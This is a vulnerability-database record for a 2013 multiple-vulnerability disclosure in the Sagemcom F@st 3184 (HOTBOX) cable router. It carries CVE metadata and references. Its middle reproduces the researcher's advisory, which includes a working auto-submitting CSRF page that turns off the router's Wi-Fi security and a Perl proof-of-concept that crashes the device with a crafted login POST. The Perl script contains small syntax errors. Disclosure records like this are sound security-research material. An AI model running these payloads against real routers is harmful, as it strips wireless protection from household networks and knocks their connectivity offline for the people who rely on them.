ID

VAR-E-201309-0002


CVE

cve_id:CVE-2013-5037

Trust: 3.0

cve_id:CVE-2013-5220

Trust: 1.8

cve_id:CVE-2013-5219

Trust: 1.8

cve_id:CVE-2013-5038

Trust: 1.8

cve_id:CVE-2013-5039

Trust: 1.8

cve_id:CVE-2013-5218

Trust: 1.8

sources: BID: 63550 // PACKETSTORM: 123901 // EXPLOIT-DB: 29518 // EDBNET: 21266 // EDBNET: 51281

EDB ID

29518


TITLE

Sagemcom F@st 3184 2.1.11 - Multiple Vulnerabilities - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 29518

DESCRIPTION

Sagemcom F@st 3184 2.1.11 - Multiple Vulnerabilities. CVE-2013-5220CVE-99381CVE-2013-5219CVE-2013-5218CVE-2013-5039CVE-2013-5038CVE-2013-5037CVE-99360CVE-99359CVE-99358CVE-99357CVE-99356 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 29518

AFFECTED PRODUCTS

vendor:sagemcommodel:f@stscope:eqversion:31842.1.11

Trust: 1.0

vendor:sagemcommodel:[email protected]scope:eqversion:31842.1.11

Trust: 0.6

vendor:hotboxmodel: - scope:eqversion:2.1.11

Trust: 0.5

vendor:sagecommodel:f@st routerscope:eqversion:31842.1.11

Trust: 0.3

sources: BID: 63550 // PACKETSTORM: 123901 // EXPLOIT-DB: 29518 // EDBNET: 51281

EXPLOIT

+------------------------------------------------------------------------------+
| HOTBOX is the leading router/modem appliance of |
| HOT Cable communication company in israel. |
| The Appliance is manufactured by SAGEMCOM |
| and carries the model name F@st 3184. |
+------------------------------------------------------------------------------+
| Title: HOTBOX Multiple Vulnerabilities |
+--------------------+---------------------------------------------------------+
| Release Date | 2013/09/09 |
| Researcher | Oz Elisyan |
+--------------------+---------------------------------------------------------+
| System Affected | HOTBOX Router/Modem |
| Versions Affected | 2.1.11 , possibly earlier |
| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|
| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, |
| CVE-2013-5039 |
| Vendor Patched | N/A |
| Classification | 0-day |
| Exploits | http://elisyan.com/hotboxDoS.pl, |
| http://elisyan.com/hotboxCSRF.html |
+--------------------+---------------------------------------------------------+

Vulnerabilities List -
# Default WPS Pin
# Authentication based on IP Address
# DoS via crafted POST
# Path/Directory Traversal
# Script injection via DHCP request
# No CSRF Token

Demo -
http://www.youtube.com/watch?v=CPlT09ZIj48

CSRF EXPLOIT:

<html>
<form action='http://192.168.1.1/goform/wlanBasicSecurity' method='POST' id=1>
<input type=hidden name="WirelessMacAddr" value="C0%3AAC%3A54%3AF8%3A67%3A58" id="WirelessMacAddr">
<input type=hidden name="WirelessEnable1" value="1" id="WirelessEnable1">
<input type=hidden name="ServiceSetIdentifier1" value="Elisyan" id="ServiceSetIdentifier1">
<input type=hidden name="WirelessVendorMode" value="3" id="WirelessVendorMode">
<input type=hidden name="ChannelNumber1" value="0" id="ChannelNumber1">
<input type=hidden name="NBandwidth1" value="20" id="NBandwidth1">
<input type=hidden name="ClosedNetwork1" value="0" id="ClosedNetwork1">
<input type=hidden name="WifiSecurity" value="0" id="WifiSecurity">
<input type=hidden name="commitwlanBasicSecurity" value="1" id="commitwlanBasicSecurity">
<input type=hidden name="restoreWirelessDefaults1" value="0" id="restoreWirelessDefaults1">
<input type=hidden name="scanActions1" value="0" id="scanActions1">
<input type=hidden name="AutoSecurity1" value="1" id="AutoSecurity1">
<input type=hidden name="wpsActions1" value="0" id="wpsActions1">

</form>
</html>
<script>document.getElementById(1).submit();</script>

DENIAL OF SERVICE EXPLOIT:

use warnings;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;

# Author: Oz Elisyan
# Date: 3 September 2013
# Affected Version: <= 2.1.11

print "# HOTBOX DoS PoC #\n\n"

unless ($ARGV[0]){
print "Please Enter Valid Host Name.\n";
exit();
}

print "Sending Evil POST request...\n";

my $HOST = $ARGV[0];
my $URL = "http://$HOST/goform/login";
my $PostData = "loginUsername=aaaloginPassword=aaa"
my $browser = LWP::UserAgent->new();
my $req = HTTP::Request->new(POST => $URL);
$req->content_type("application/x-www-form-urlencoded");
$req->content($PostData);
my $resp = $browser->request($req);

print "Done.";

Trust: 1.0

sources: EXPLOIT-DB: 29518

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 29518

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 29518

TYPE

Multiple Vulnerabilities

Trust: 1.6

sources: EXPLOIT-DB: 29518 // EDBNET: 51281

TAGS

tag:exploit

Trust: 0.5

tag:denial of service

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:proof of concept

Trust: 0.5

tag:file inclusion

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 123901

CREDITS

Oz Elisyan

Trust: 0.6

sources: EXPLOIT-DB: 29518

EXTERNAL IDS

db:NVDid:CVE-2013-5037

Trust: 3.0

db:NVDid:CVE-2013-5220

Trust: 1.8

db:NVDid:CVE-2013-5219

Trust: 1.8

db:NVDid:CVE-2013-5038

Trust: 1.8

db:NVDid:CVE-2013-5039

Trust: 1.8

db:NVDid:CVE-2013-5218

Trust: 1.8

db:EXPLOIT-DBid:29518

Trust: 1.6

db:0DAYTODAYid:21465

Trust: 0.6

db:EDBNETid:21266

Trust: 0.6

db:EDBNETid:51281

Trust: 0.6

db:PACKETSTORMid:123901

Trust: 0.5

db:BIDid:63550

Trust: 0.3

sources: BID: 63550 // PACKETSTORM: 123901 // EXPLOIT-DB: 29518 // EDBNET: 21266 // EDBNET: 51281

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2013-5037

Trust: 2.7

url:https://nvd.nist.gov/vuln/detail/cve-2013-5220

Trust: 1.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-5038

Trust: 1.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-5219

Trust: 1.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-5039

Trust: 1.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-5218

Trust: 1.5

url:https://0day.today/exploits/21465

Trust: 0.6

url:https://www.exploit-db.com/exploits/29518/

Trust: 0.6

url:http://www.sagemcom.com/index.php?id=1760&l=25

Trust: 0.3

url:http://seclists.org/fulldisclosure/2013/nov/17

Trust: 0.3

sources: BID: 63550 // PACKETSTORM: 123901 // EXPLOIT-DB: 29518 // EDBNET: 21266 // EDBNET: 51281

SOURCES

db:BIDid:63550
db:PACKETSTORMid:123901
db:EXPLOIT-DBid:29518
db:EDBNETid:21266
db:EDBNETid:51281

LAST UPDATE DATE

2022-07-27T09:45:13.202000+00:00


SOURCES UPDATE DATE

db:BIDid:63550date:2013-09-09T00:00:00

SOURCES RELEASE DATE

db:BIDid:63550date:2013-09-09T00:00:00
db:PACKETSTORMid:123901date:2013-11-04T13:03:33
db:EXPLOIT-DBid:29518date:2013-11-08T00:00:00
db:EDBNETid:21266date:2013-11-05T00:00:00
db:EDBNETid:51281date:2013-11-08T00:00:00